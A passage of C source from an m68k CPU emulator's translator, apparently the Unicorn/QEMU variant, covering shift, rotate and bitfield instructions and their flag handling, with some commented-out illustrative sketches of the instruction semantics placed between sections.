!logical); TCGv s32; TCGv_i64 t64, s64; t64 = tcg_temp_new_i64(tcg_ctx); s64 = tcg_temp_new_i64(tcg_ctx); s32 = tcg_temp_new(tcg_ctx); /* * Note that m68k truncates the shift count modulo 64, not 32. * In addition, a 64-bit shift makes it easy to find "the last * bit shifted out", for the carry flag. */ tcg_gen_andi_i32(tcg_ctx, s32, DREG(insn, 9), 63); tcg_gen_extu_i32_i64(tcg_ctx, s64, s32); tcg_gen_extu_i32_i64(tcg_ctx, t64, reg); /* Optimistically set V=0. Also used as a zero source below. 
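*/

/*
 * Illustrative sketch, not part of the build: the immediate asl V test
 * from shift_im() above, byte-sized.  For count < 8, V must be set iff
 * the sign bit changes at any point during the shift, i.e. iff the top
 * (count + 1) bits of the source are not all equal; the two arithmetic
 * right shifts compare exactly those bits.  Assumes an arithmetic >>
 * on signed values, as generated by mainstream compilers.  Names are
 * placeholders.
 */
#if 0
static int asl_b_overflows(int8_t reg, int count)   /* 1 <= count <= 8 */
{
    if (count >= 8) {
        return reg != 0;      /* every bit passes through the sign bit */
    }
    return (reg >> 7) != (reg >> (8 - count - 1));
}
#endif

/* Optimistically set V=0. Also used as a zero source below.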
*/ tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shl_i64(tcg_ctx, t64, t64, s64); if (opsize == OS_LONG) { tcg_gen_extr_i64_i32(tcg_ctx, QREG_CC_N, QREG_CC_C, t64); /* Note that C=0 if shift count is 0, and we get that for free. */ } else { TCGv zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, QREG_CC_N, t64); tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, QREG_CC_N, bits); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, s32, zero, zero, QREG_CC_C); tcg_temp_free(tcg_ctx, zero); } tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); /* X = C, but only if the shift count was non-zero. */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, s32, QREG_CC_V, QREG_CC_C, QREG_CC_X); /* * M68000 sets V if the most significant bit is changed at * any time during the shift operation. Do this via creating * an extension of the sign bit, comparing, and discarding * the bits below the sign bit. I.e. * int64_t s = (intN_t)reg; * int64_t t = (int64_t)(intN_t)reg << count; * V = ((s ^ t) & (-1 << (bits - 1))) != 0 */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { TCGv_i64 tt = tcg_const_i64(tcg_ctx, 32); /* if shift is greater than 32, use 32 */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GT, s64, s64, tt, tt, s64); tcg_temp_free_i64(tcg_ctx, tt); /* Sign extend the input to 64 bits; re-do the shift. */ tcg_gen_ext_i32_i64(tcg_ctx, t64, reg); tcg_gen_shl_i64(tcg_ctx, s64, t64, s64); /* Clear all bits that are unchanged. */ tcg_gen_xor_i64(tcg_ctx, t64, t64, s64); /* Ignore the bits below the sign bit. */ #ifdef _MSC_VER tcg_gen_andi_i64(tcg_ctx, t64, t64, 0xffffffffffffffffULL << (bits - 1)); #else tcg_gen_andi_i64(tcg_ctx, t64, t64, -1ULL << (bits - 1)); #endif /* If any bits remain set, we have overflow. */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t64, t64, 0); tcg_gen_extrl_i64_i32(tcg_ctx, QREG_CC_V, t64); tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); } } else { tcg_gen_shli_i64(tcg_ctx, t64, t64, 32); if (logical) { tcg_gen_shr_i64(tcg_ctx, t64, t64, s64); } else { tcg_gen_sar_i64(tcg_ctx, t64, t64, s64); } tcg_gen_extr_i64_i32(tcg_ctx, QREG_CC_C, QREG_CC_N, t64); /* Note that C=0 if shift count is 0, and we get that for free. */ tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 31); /* X = C, but only if the shift count was non-zero. */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, s32, QREG_CC_V, QREG_CC_C, QREG_CC_X); } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_temp_free(tcg_ctx, s32); tcg_temp_free_i64(tcg_ctx, s64); tcg_temp_free_i64(tcg_ctx, t64); /* Write back the result. 
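*/

/*
 * Illustrative sketch, not part of the build: the 64-bit trick used by
 * shift_reg() above for a long logical right shift, on host integers.
 * Placing the operand in the high half first means that, after the
 * shift, the high word is the result and bit 31 of the low word is the
 * last bit shifted out (C).  The count is truncated modulo 64, so
 * counts of 32..63 shift everything out.  Names are placeholders.
 */
#if 0
static uint32_t lsr_l_model(uint32_t reg, unsigned count, int *c)
{
    uint64_t t = (uint64_t)reg << 32;
    count &= 63;
    t >>= count;
    *c = count ? (int)((uint32_t)t >> 31) : 0;  /* C = 0 for count 0 */
    return (uint32_t)(t >> 32);
}
#endif

/* Write back the result.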
*/ gen_partset_reg(tcg_ctx, opsize, DREG(insn, 0), QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(shift8_im) { shift_im(s, insn, OS_BYTE); } DISAS_INSN(shift16_im) { shift_im(s, insn, OS_WORD); } DISAS_INSN(shift_im) { shift_im(s, insn, OS_LONG); } DISAS_INSN(shift8_reg) { shift_reg(s, insn, OS_BYTE); } DISAS_INSN(shift16_reg) { shift_reg(s, insn, OS_WORD); } DISAS_INSN(shift_reg) { shift_reg(s, insn, OS_LONG); } DISAS_INSN(shift_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int logical = insn & 8; int left = insn & 0x100; TCGv src; TCGv addr; SRC_EA(env, src, OS_WORD, !logical, &addr); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, src, 15); tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, 1); /* * Note that ColdFire always clears V, * while M68000 sets V if the most significant bit is changed at * any time during the shift operation */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { src = gen_extend(s, src, OS_WORD, 1); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); } } else { tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, src); if (logical) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_N, src, 1); } else { tcg_gen_sari_i32(tcg_ctx, QREG_CC_N, src, 1); } } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, OS_WORD, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); DEST_EA(env, insn, OS_WORD, QREG_CC_N, &addr); set_cc_op(s, CC_OP_FLAGS); } static void rotate(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left, int size) { switch (size) { case 8: /* Replicate the 8-bit input so that a 32-bit rotate works. */ tcg_gen_ext8u_i32(tcg_ctx, reg, reg); tcg_gen_muli_i32(tcg_ctx, reg, reg, 0x01010101); goto do_long; case 16: /* Replicate the 16-bit input so that a 32-bit rotate works. */ tcg_gen_deposit_i32(tcg_ctx, reg, reg, reg, 16, 16); goto do_long; do_long: default: if (left) { tcg_gen_rotl_i32(tcg_ctx, reg, reg, shift); } else { tcg_gen_rotr_i32(tcg_ctx, reg, reg, shift); } } /* compute flags */ switch (size) { case 8: tcg_gen_ext8s_i32(tcg_ctx, reg, reg); break; case 16: tcg_gen_ext16s_i32(tcg_ctx, reg, reg); break; default: break; } /* QREG_CC_X is not affected */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, reg); if (left) { tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, reg, 1); } else { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, 31); } tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); /* always cleared */ } static void rotate_x_flags(TCGContext *tcg_ctx, TCGv reg, TCGv X, int size) { switch (size) { case 8: tcg_gen_ext8s_i32(tcg_ctx, reg, reg); break; case 16: tcg_gen_ext16s_i32(tcg_ctx, reg, reg); break; default: break; } tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, reg); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, X); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); } /* Result of rotate_x() is valid if 0 <= shift <= size */ static TCGv rotate_x(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left, int size) { TCGv X, shl, shr, shx, sz, zero; sz = tcg_const_i32(tcg_ctx, size); shr = tcg_temp_new(tcg_ctx); shl = tcg_temp_new(tcg_ctx); shx = tcg_temp_new(tcg_ctx); if (left) { tcg_gen_mov_i32(tcg_ctx, shl, shift); /* shl = shift */ tcg_gen_movi_i32(tcg_ctx, shr, size + 1); tcg_gen_sub_i32(tcg_ctx, shr, shr, shift); /* shr = size + 1 - shift */ tcg_gen_subi_i32(tcg_ctx, shx, shift, 1); /* shx = shift - 1 */ /* shx = shx < 0 ? 
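size : shx; */

/*
 * Illustrative sketch, not part of the build: ROXL treats X:reg as a
 * (size + 1)-bit quantity and rotates it, which is what the shl/shr/shx
 * terms computed here reconstruct.  Host-integer model for a byte
 * operand; names are placeholders.
 */
#if 0
static uint8_t roxl_b_model(uint8_t reg, int x_in, unsigned count, int *x_out)
{
    unsigned v = ((unsigned)x_in << 8) | reg;       /* 9-bit value X:reg */
    count %= 9;
    v = ((v << count) | (v >> (9 - count))) & 0x1ff;
    *x_out = (v >> 8) & 1;
    return (uint8_t)v;
}
#endif

/* shx = shx < 0 ?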
size : shx; */ zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, shx, shx, zero, sz, shx); tcg_temp_free(tcg_ctx, zero); } else { tcg_gen_mov_i32(tcg_ctx, shr, shift); /* shr = shift */ tcg_gen_movi_i32(tcg_ctx, shl, size + 1); tcg_gen_sub_i32(tcg_ctx, shl, shl, shift); /* shl = size + 1 - shift */ tcg_gen_sub_i32(tcg_ctx, shx, sz, shift); /* shx = size - shift */ } tcg_temp_free_i32(tcg_ctx, sz); /* reg = (reg << shl) | (reg >> shr) | (x << shx); */ tcg_gen_shl_i32(tcg_ctx, shl, reg, shl); tcg_gen_shr_i32(tcg_ctx, shr, reg, shr); tcg_gen_or_i32(tcg_ctx, reg, shl, shr); tcg_temp_free(tcg_ctx, shl); tcg_temp_free(tcg_ctx, shr); tcg_gen_shl_i32(tcg_ctx, shx, QREG_CC_X, shx); tcg_gen_or_i32(tcg_ctx, reg, reg, shx); tcg_temp_free(tcg_ctx, shx); /* X = (reg >> size) & 1 */ X = tcg_temp_new(tcg_ctx); tcg_gen_extract_i32(tcg_ctx, X, reg, size, 1); return X; } /* Result of rotate32_x() is valid if 0 <= shift < 33 */ static TCGv rotate32_x(TCGContext *tcg_ctx, TCGv reg, TCGv shift, int left) { TCGv_i64 t0, shift64; TCGv X, lo, hi, zero; shift64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, shift64, shift); t0 = tcg_temp_new_i64(tcg_ctx); X = tcg_temp_new(tcg_ctx); lo = tcg_temp_new(tcg_ctx); hi = tcg_temp_new(tcg_ctx); if (left) { /* create [reg:X:..] */ tcg_gen_shli_i32(tcg_ctx, lo, QREG_CC_X, 31); tcg_gen_concat_i32_i64(tcg_ctx, t0, lo, reg); /* rotate */ tcg_gen_rotl_i64(tcg_ctx, t0, t0, shift64); tcg_temp_free_i64(tcg_ctx, shift64); /* result is [reg:..:reg:X] */ tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t0); tcg_gen_andi_i32(tcg_ctx, X, lo, 1); tcg_gen_shri_i32(tcg_ctx, lo, lo, 1); } else { /* create [..:X:reg] */ tcg_gen_concat_i32_i64(tcg_ctx, t0, reg, QREG_CC_X); tcg_gen_rotr_i64(tcg_ctx, t0, t0, shift64); tcg_temp_free_i64(tcg_ctx, shift64); /* result is value: [X:reg:..:reg] */ tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t0); /* extract X */ tcg_gen_shri_i32(tcg_ctx, X, hi, 31); /* extract result */ tcg_gen_shli_i32(tcg_ctx, hi, hi, 1); } tcg_temp_free_i64(tcg_ctx, t0); tcg_gen_or_i32(tcg_ctx, lo, lo, hi); tcg_temp_free(tcg_ctx, hi); /* if shift == 0, register and X are not affected */ zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, X, shift, zero, QREG_CC_X, X); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, reg, shift, zero, reg, lo); tcg_temp_free(tcg_ctx, zero); tcg_temp_free(tcg_ctx, lo); return X; } DISAS_INSN(rotate_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv shift; int tmp; int left = (insn & 0x100); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, DREG(insn, 0), shift, left, 32); } else { TCGv X = rotate32_x(tcg_ctx, DREG(insn, 0), shift, left); rotate_x_flags(tcg_ctx, DREG(insn, 0), X, 32); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate8_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int left = (insn & 0x100); TCGv reg; TCGv shift; int tmp; reg = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, reg, shift, left, 8); } else { TCGv X = rotate_x(tcg_ctx, reg, shift, left, 8); rotate_x_flags(tcg_ctx, reg, X, 8); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate16_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int left = (insn & 0x100); TCGv reg; TCGv shift; int tmp; reg = gen_extend(s, 
DREG(insn, 0), OS_WORD, 0); tmp = (insn >> 9) & 7; if (tmp == 0) { tmp = 8; } shift = tcg_const_i32(tcg_ctx, tmp); if (insn & 8) { rotate(tcg_ctx, reg, shift, left, 16); } else { TCGv X = rotate_x(tcg_ctx, reg, shift, left, 16); rotate_x_flags(tcg_ctx, reg, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); gen_partset_reg(tcg_ctx, OS_WORD, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = DREG(insn, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 31); rotate(tcg_ctx, reg, t1, left, 32); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 33 */ tcg_gen_movi_i32(tcg_ctx, t1, 33); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate32_x(tcg_ctx, DREG(insn, 0), t1, left); rotate_x_flags(tcg_ctx, DREG(insn, 0), X, 32); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate8_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = gen_extend(s, DREG(insn, 0), OS_BYTE, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 7); rotate(tcg_ctx, reg, t1, left, 8); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 9 */ tcg_gen_movi_i32(tcg_ctx, t1, 9); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate_x(tcg_ctx, reg, t1, left, 8); rotate_x_flags(tcg_ctx, reg, X, 8); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); gen_partset_reg(tcg_ctx, OS_BYTE, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate16_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv src; TCGv t0, t1; int left = (insn & 0x100); reg = gen_extend(s, DREG(insn, 0), OS_WORD, 0); src = DREG(insn, 9); /* shift in [0..63] */ t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, src, 63); t1 = tcg_temp_new_i32(tcg_ctx); if (insn & 8) { tcg_gen_andi_i32(tcg_ctx, t1, src, 15); rotate(tcg_ctx, reg, t1, left, 16); /* if shift == 0, clear C */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, QREG_CC_C, t0, QREG_CC_V /* 0 */, QREG_CC_V /* 0 */, QREG_CC_C); } else { TCGv X; /* modulo 17 */ tcg_gen_movi_i32(tcg_ctx, t1, 17); tcg_gen_remu_i32(tcg_ctx, t1, t0, t1); X = rotate_x(tcg_ctx, reg, t1, left, 16); rotate_x_flags(tcg_ctx, reg, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); gen_partset_reg(tcg_ctx, OS_WORD, DREG(insn, 0), reg); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(rotate_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr; TCGv shift; int left = (insn & 0x100); SRC_EA(env, src, OS_WORD, 0, &addr); shift = tcg_const_i32(tcg_ctx, 1); if (insn & 0x0200) { rotate(tcg_ctx, src, shift, left, 16); } else { TCGv X = rotate_x(tcg_ctx, src, shift, left, 16); rotate_x_flags(tcg_ctx, src, X, 16); tcg_temp_free(tcg_ctx, X); } tcg_temp_free(tcg_ctx, shift); DEST_EA(env, insn, OS_WORD, src, &addr); set_cc_op(s, CC_OP_FLAGS); } DISAS_INSN(bfext_reg) { 
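/*
 * Illustrative sketch, not part of the build: what the register
 * bitfield instructions address.  Bit offsets count from the MSB
 * (big-endian bit numbering) and wrap modulo 32, which is why the code
 * below rotates the field to the top of the word before extracting.
 * A width field of 0 encodes 32.  Names are placeholders.
 */
#if 0
static uint32_t bf_reg_extract_u(uint32_t src, int ofs, int len)
{
    int r = ofs & 31;                        /* offsets wrap modulo 32 */
    uint32_t rot = r ? (src << r) | (src >> (32 - r)) : src;
    return rot >> (32 - len);                /* 1 <= len <= 32 */
}
#endif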
TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); int is_sign = insn & 0x200; TCGv src = DREG(insn, 0); TCGv dst = DREG(ext, 12); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ int pos = 32 - ofs - len; /* little bit-endian */ TCGv tmp = tcg_temp_new(tcg_ctx); TCGv shift; /* * In general, we're going to rotate the field so that it's at the * top of the word and then right-shift by the complement of the * width to extend the field. */ if (ext & 0x20) { /* Variable width. */ if (ext & 0x800) { /* Variable offset. */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, tmp, src, tmp); } else { tcg_gen_rotli_i32(tcg_ctx, tmp, src, ofs); } shift = tcg_temp_new(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, shift, DREG(ext, 0)); tcg_gen_andi_i32(tcg_ctx, shift, shift, 31); tcg_gen_sar_i32(tcg_ctx, QREG_CC_N, tmp, shift); if (is_sign) { tcg_gen_mov_i32(tcg_ctx, dst, QREG_CC_N); } else { tcg_gen_shr_i32(tcg_ctx, dst, tmp, shift); } tcg_temp_free(tcg_ctx, shift); } else { /* Immediate width. */ if (ext & 0x800) { /* Variable offset */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, tmp, src, tmp); src = tmp; pos = 32 - len; } else { /* * Immediate offset. If the field doesn't wrap around the * end of the word, rely on (s)extract completely. */ if (pos < 0) { tcg_gen_rotli_i32(tcg_ctx, tmp, src, ofs); src = tmp; pos = 32 - len; } } tcg_gen_sextract_i32(tcg_ctx, QREG_CC_N, src, pos, len); if (is_sign) { tcg_gen_mov_i32(tcg_ctx, dst, QREG_CC_N); } else { tcg_gen_extract_i32(tcg_ctx, dst, src, pos, len); } } tcg_temp_free(tcg_ctx, tmp); set_cc_op(s, CC_OP_LOGIC); } DISAS_INSN(bfext_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); int is_sign = insn & 0x200; TCGv dest = DREG(ext, 12); TCGv addr, len, ofs; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } if (is_sign) { gen_helper_bfexts_mem(tcg_ctx, dest, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, dest); } else { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_bfextu_mem(tcg_ctx, tmp, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_extr_i64_i32(tcg_ctx, dest, QREG_CC_N, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(bfop_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv src = DREG(insn, 0); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ TCGv mask, tofs, tlen; tofs = NULL; tlen = NULL; if ((insn & 0x0f00) == 0x0d00) { /* bfffo */ tofs = tcg_temp_new(tcg_ctx); tlen = tcg_temp_new(tcg_ctx); } if ((ext & 0x820) == 0) { /* Immediate width and offset. 
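*/

/*
 * Illustrative sketch, not part of the build: the mask algebra used by
 * bfop_reg, on host integers.  ~(0x7fffffffu >> (len - 1)) is a
 * left-aligned run of len one bits; rotating it right by ofs lays it
 * over the field.  bfclr then ANDs with the complement, bfset ORs the
 * field in, and bfchg XORs it.  Names are placeholders.
 */
#if 0
static uint32_t bf_field_mask(int ofs, int len)      /* 1 <= len <= 32 */
{
    uint32_t field = ~(0x7fffffffu >> (len - 1));    /* top len bits */
    int r = ofs & 31;
    return r ? (field >> r) | (field << (32 - r)) : field;
}
#endif

/* Immediate width and offset.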
*/ uint32_t maski = 0x7fffffffu >> (len - 1); if (ofs + len <= 32) { tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, ofs); } else { tcg_gen_rotli_i32(tcg_ctx, QREG_CC_N, src, ofs); } tcg_gen_andi_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, ~maski); mask = tcg_const_i32(tcg_ctx, ror32(maski, ofs)); if (tofs) { tcg_gen_movi_i32(tcg_ctx, tofs, ofs); tcg_gen_movi_i32(tcg_ctx, tlen, len); } } else { TCGv tmp = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_subi_i32(tcg_ctx, tmp, DREG(ext, 0), 1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 31); mask = tcg_const_i32(tcg_ctx, 0x7fffffffu); tcg_gen_shr_i32(tcg_ctx, mask, mask, tmp); if (tlen) { tcg_gen_addi_i32(tcg_ctx, tlen, tmp, 1); } } else { /* Immediate width */ mask = tcg_const_i32(tcg_ctx, 0x7fffffffu >> (len - 1)); if (tlen) { tcg_gen_movi_i32(tcg_ctx, tlen, len); } } if (ext & 0x800) { /* Variable offset */ tcg_gen_andi_i32(tcg_ctx, tmp, DREG(ext, 6), 31); tcg_gen_rotl_i32(tcg_ctx, QREG_CC_N, src, tmp); tcg_gen_andc_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, mask); tcg_gen_rotr_i32(tcg_ctx, mask, mask, tmp); if (tofs) { tcg_gen_mov_i32(tcg_ctx, tofs, tmp); } } else { /* Immediate offset (and variable width) */ tcg_gen_rotli_i32(tcg_ctx, QREG_CC_N, src, ofs); tcg_gen_andc_i32(tcg_ctx, QREG_CC_N, QREG_CC_N, mask); tcg_gen_rotri_i32(tcg_ctx, mask, mask, ofs); if (tofs) { tcg_gen_movi_i32(tcg_ctx, tofs, ofs); } } tcg_temp_free(tcg_ctx, tmp); } set_cc_op(s, CC_OP_LOGIC); switch (insn & 0x0f00) { case 0x0a00: /* bfchg */ tcg_gen_eqv_i32(tcg_ctx, src, src, mask); break; case 0x0c00: /* bfclr */ tcg_gen_and_i32(tcg_ctx, src, src, mask); break; case 0x0d00: /* bfffo */ gen_helper_bfffo_reg(tcg_ctx, DREG(ext, 12), QREG_CC_N, tofs, tlen); tcg_temp_free(tcg_ctx, tlen); tcg_temp_free(tcg_ctx, tofs); break; case 0x0e00: /* bfset */ tcg_gen_orc_i32(tcg_ctx, src, src, mask); break; case 0x0800: /* bftst */ /* flags already set; no other work to do. 
*/ break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, mask); } DISAS_INSN(bfop_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv addr, len, ofs; TCGv_i64 t64; addr = gen_lea(env, s, insn, OS_UNSIZED); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } if (ext & 0x20) { len = DREG(ext, 0); } else { len = tcg_const_i32(tcg_ctx, extract32(ext, 0, 5)); } if (ext & 0x800) { ofs = DREG(ext, 6); } else { ofs = tcg_const_i32(tcg_ctx, extract32(ext, 6, 5)); } switch (insn & 0x0f00) { case 0x0a00: /* bfchg */ gen_helper_bfchg_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0c00: /* bfclr */ gen_helper_bfclr_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0d00: /* bfffo */ t64 = tcg_temp_new_i64(tcg_ctx); gen_helper_bfffo_mem(tcg_ctx, t64, tcg_ctx->cpu_env, addr, ofs, len); tcg_gen_extr_i64_i32(tcg_ctx, DREG(ext, 12), QREG_CC_N, t64); tcg_temp_free_i64(tcg_ctx, t64); break; case 0x0e00: /* bfset */ gen_helper_bfset_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; case 0x0800: /* bftst */ gen_helper_bfexts_mem(tcg_ctx, QREG_CC_N, tcg_ctx->cpu_env, addr, ofs, len); break; default: g_assert_not_reached(); } set_cc_op(s, CC_OP_LOGIC); if (!(ext & 0x20)) { tcg_temp_free(tcg_ctx, len); } if (!(ext & 0x800)) { tcg_temp_free(tcg_ctx, ofs); } } DISAS_INSN(bfins_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int ext = read_im16(env, s); TCGv dst = DREG(insn, 0); TCGv src = DREG(ext, 12); int len = ((extract32(ext, 0, 5) - 1) & 31) + 1; int ofs = extract32(ext, 6, 5); /* big bit-endian */ int pos = 32 - ofs - len; /* little bit-endian */ TCGv tmp; tmp = tcg_temp_new(tcg_ctx); if (ext & 0x20) { /* Variable width */ tcg_gen_neg_i32(tcg_ctx, tmp, DREG(ext, 0)); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 31); tcg_gen_shl_i32(tcg_ctx, QREG_CC_N, src, tmp); } else { /* Immediate width */ tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, src, 32 - len); } set_cc_op(s, CC_OP_LOGIC); /* Immediate width and offset */ if ((ext & 0x820) == 0) { /* Check for suitability for deposit. 
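*/

/*
 * Illustrative sketch, not part of the build: the wrap-around insert
 * path of bfins on host integers.  maski has zeros in its low len
 * bits; rotating the masked source right by (ofs + len) places the
 * field so that it straddles bit 31/bit 0 when ofs + len > 32.  Names
 * are placeholders.
 */
#if 0
static uint32_t bfins_wrap_model(uint32_t dst, uint32_t src, int ofs, int len)
{
    uint32_t maski = (uint32_t)-2 << (len - 1);   /* ~(low len ones) */
    unsigned roti = (unsigned)(ofs + len) & 31;
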